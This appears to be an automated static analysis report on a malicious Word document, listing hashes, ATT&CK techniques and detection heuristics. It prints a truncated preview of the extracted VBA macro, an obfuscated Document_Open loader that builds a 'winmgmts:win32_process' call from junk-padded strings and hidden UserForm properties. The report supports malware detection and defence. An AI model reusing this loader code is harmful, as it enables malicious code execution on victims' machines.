Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 34df63aaf08820ef…

MALICIOUS

Office (OLE)

Size: 196.7 KB
Created: 2020-08-19 21:56:00
Authoring application: Microsoft Office Word
First seen: 2020-09-07
MD5: 7a90233bda140f945d7c11b9fd36c0c6
SHA-1: 620bbda74f046ba9174887d7d2d4751aec1bbc71
SHA-256: 34df63aaf08820ef807a0992d54df52142bea2fc2135e5f4012ab9f1f89aaac9
Risk Score: 262

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro and a hidden UserForm command stager, which are indicative of malicious intent. The presence of these elements suggests the document is designed to execute arbitrary code, likely to download and run a second-stage payload. ClamAV detection further supports the malicious classification.

Heuristics 7

  • ClamAV: Doc.Malware.Sagent-9403896-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Sagent-9403896-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 15403 bytes
SHA-256: 9cbf0a3a5c13b9e03509e56a7d74a249d26420b3922a433567fcb381df041377
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "I7idwd64tfnbzkbfk"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
Pdcjb1w260q0bh23.Bim7rgvyedd_
End Sub


Attribute VB_Name = "Pdcjb1w260q0bh23"
Attribute VB_Base = "0{507B0B02-5725-407C-83F5-6054E57418F5}{42CD4AA6-C709-4489-820F-75FA577DBB80}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Bim7rgvyedd_()
   Sapbw49stjf64wrm = "302"
If Len("Pls0vkz4r_k7y67Mayttil72tz4ctspv") = Len("Hlz3e21ie5yx6oj") + 1 Then End
If Len("Iv45_n_xibwS0r6kdvve1794kesheHubh8x3w8lbuce5t") < Len("I4m35z8w16az") Then
        MsgBox "Npeomny2vitsy" + "Cg55_39gp38r7"
        MsgBox ("Ph328y4wqz3r")
        MsgBox "K3u4kgp5p7ab9lmam" + "Wssfnq3v_rr2eb"
End If
If Len("Xtp60xkqmgl21_mPdh8_njoebzg9m") = Len("T0sa49fn7vbg0bzb") Then
       MsgBox "R_6x9fuuja299et" + "Mu3i0uur2lm9hlmp_c"
       MsgBox ("Ysc450rt8oq9qsg !!!")
       MsgBox "M95ydqo8x5wn0y" + "Y6wvsq20jsbxc"
End If

Phy9p2nlqi8 = Pdcjb1w260q0bh23.HelpContextId + 50 + 50
   A4lbsn4fsvjmy3 = "936"
If Len("Ycg2qqh1xx7k2faTwqm498z_mymhg7p") = Len("Sw71xb94dyowcb_") + 1 Then End
If Len("Ys1hq3afs3e36tTqybue0evttzjtXkz6jyfhg9v") < Len("F79f9vgygpaqn0of") Then
        MsgBox "Xd2xq65daj5wjsd0" + "Tixnwdd78sjjsk"
        MsgBox ("Asj65e3bdc9lm")
        MsgBox "X99s0ifsml_" + "Tunu6t0vw2iiej_h"
End If
If Len("Hz425_um2tcdsg9Eniyuipn3qgzzo1j00") = Len("Qh90u4hd_8r") Then
       MsgBox "Okn982tacjp" + "J57yn54ftelzjpy7me"
       MsgBox ("Mlnvomq4sp00n3 !!!")
       MsgBox "P29u1gdmuq_yzsdyz9" + "Yyairl9al1vg98k58"
End If

Dlh4be10iope2llmi = ChrW(Phy9p2nlqi8 + (15))
   Mtydvn57n8nxha = "358"
If Len("M8iwoqowvq7xyQyoq5jo7t_l") = Len("F115c100yt6o69") + 1 Then End
If Len("Xcx11g32i_hT_wojlajz73ofSqe5av8gr47kwhp_") < Len("W7ng0bewd6zobl") Then
        MsgBox "Oarmxp0wrvt4s" + "S451o8s4t2o_i92h3q"
        MsgBox ("Q1v2dnc7k8vqiwx")
        MsgBox "B6zxo33s19xhb6" + "Vcl7jeb1mmbh8"
End If
If Len("Hgnvuzmd5e70dag176Q3n91nj_fmlnu6") = Len("K3jwsf81jgakbau") Then
       MsgBox "Lg3jf9ixhk1h2t3m" + "Nwpqjnk1bd3"
       MsgBox ("Ci0w16g3vprtwohq !!!")
       MsgBox "Z2ozhtpegh5sud5r" + "Dc2wbzwutde767f6ac"
End If

Ykc9crcjhpb01eg6z = "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfi111ss[sns ]]d][ jsa nbsb22v2yfnm111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfgm111ss[sns ]]d][ jsa nbsb22v2yft111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf" + Dlh4be10iope2llmi + "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf:111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfin111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf3111ss[sns ]]d][ jsa nbsb22v2yf2111ss[sns ]]d][ jsa nbsb22v2yf_111ss[sns ]]d][ jsa nbsb22v2yf" + Pdcjb1w260q0bh23.Luijmc2l3929 + "111ss[sns ]]d][ jsa nbsb22v2yfro111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfce111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yf"
   Cku7hjjihlywskg02a = "942"
If Len("N_rbt5hz5pf1zsx9gAbe87k1wz_rk6pw") = Len("Q8xjbcavq5bw") + 1 Then End
If Len("D6n_p1_zwegl8fihtuCr72k9s0atrciexuCkq1wtb3q9e") < Len("Un9jlssjddc820fec0") Then
        MsgBox "Hvddiebs9605" + "Kbigt48wflabit0yo8"
        MsgBox ("M15mzjzfkaupejct")
        MsgBox "S0wjcwfkccawc6u0" + "Ikuzu85yxwv7"
End If
If Len("Ufaj9plrqezbwhzuhgM7940afb3vpauogk6v") = Len("Xey37f7x01eeppvpa") Then
       MsgBox "Jbi3nt7aeeyp860nj" + "Vebydnhmxr_v__gqr"
       MsgBox ("Pf2e77a2_u4kgcg !!!")
       MsgBox "P73197vb8paufyiq" + "K3ee1igxnnxunk"
End If

Olau1p4mmly9nzj3 = Ynjahyvoc8dxxfs(Ykc9crcjhpb01eg6z)
   Nymysxdzbhxiym = "408"
If Len("Hzbnvk_htho7j84rwBwp6i4lz9278f") = Len("Lu7ca0xhtq4qd
... (truncated)